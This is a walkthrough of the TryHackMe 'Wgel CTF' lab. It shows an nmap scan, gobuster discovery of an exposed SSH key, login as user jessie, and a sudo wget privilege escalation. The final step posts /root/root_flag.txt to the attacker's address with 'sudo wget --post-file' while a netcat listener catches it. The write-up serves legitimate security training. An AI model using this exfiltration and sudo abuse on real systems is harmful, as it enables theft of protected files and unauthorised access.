3 minutes
THM: Wgel CTF
Title:Wgel CTF
Description:Can you exfiltrate the root flag?
Difficulty:Easy
Tags:
Nmap
First we scan for open ports
# nmap -p- -T4 -sV -sC 10.10.224.110 -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-02 18:20 BST
Nmap scan report for 10.10.224.110
Host is up (0.021s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 94:96:1b:66:80:1b:76:48:68:2d:14:b5:9a:01:aa:aa (RSA)
| 256 18:f7:10:cc:5f:40:f6:cf:92:f8:69:16:e2:48:f4:38 (ECDSA)
|_ 256 b9:0b:97:2e:45:9b:f3:2a:4b:11:c7:83:10:33:e0:ce (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.68 seconds
Website
Looking at the website it appears to be the standard apache holding page, however when looking closer at the source code there is a comment giving away a potential user.
Running gobuster against the site and it finds a directory called sitemap. This has a basic website running so we run gobuster again
# gobuster dir -u http://10.10.224.110/sitemap/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.224.110/sitemap/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/.ssh (Status: 301) [Size: 321] [--> http://10.10.224.110/sitemap/.ssh/]
/css (Status: 301) [Size: 320] [--> http://10.10.224.110/sitemap/css/]
/fonts (Status: 301) [Size: 322] [--> http://10.10.224.110/sitemap/fonts/]
/images (Status: 301) [Size: 323] [--> http://10.10.224.110/sitemap/images/]
/index.html (Status: 200) [Size: 21080]
/js (Status: 301) [Size: 319] [--> http://10.10.224.110/sitemap/js/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
This scan has revealed another directory called .ssh and looking in it we can see what looks like a key.
SSH
Using this downloaded key we can SSH to the box with the username we found earlier (jessie) and get the user flag.
# ssh jessie@10.10.224.110 -i id_rsa
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-45-generic i686)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
8 packages can be updated.
8 updates are security updates.
Last login: Sat Aug 2 20:44:11 2025 from 10.11.18.78
jessie@CorpOne:~$ ls
Desktop Documents Downloads examples.desktop Music Pictures Public Templates Videos
jessie@CorpOne:~$ ls */*
Documents/user_flag.txt
jessie@CorpOne:~$ cat Documents/user_flag.txt
05****************************f6
Privilege Escalation
Checking Jessie’s permissions we can see they can run wget with sudo permissions without needed to provide a password. A lookup on GTFOBins, and we have a way to extract the root flag back to our listener.
jessie@CorpOne:~$ sudo -l
Matching Defaults entries for jessie on CorpOne:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User jessie may run the following commands on CorpOne:
(ALL : ALL) ALL
(root) NOPASSWD: /usr/bin/wget
jessie@CorpOne:~$ sudo wget --post-file=/root/root_flag.txt http://10.11.18.78
--2025-08-02 21:02:23-- http://10.11.18.78/
Connecting to 10.11.18.78:80... connected.
HTTP request sent, awaiting response... No data received.
# nc -lvnp 80
listening on [any] 80 ...
connect to [10.11.18.78] from (UNKNOWN) [10.10.224.110] 45464
POST / HTTP/1.1
User-Agent: Wget/1.17.1 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 10.11.18.78
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
b1****************************3d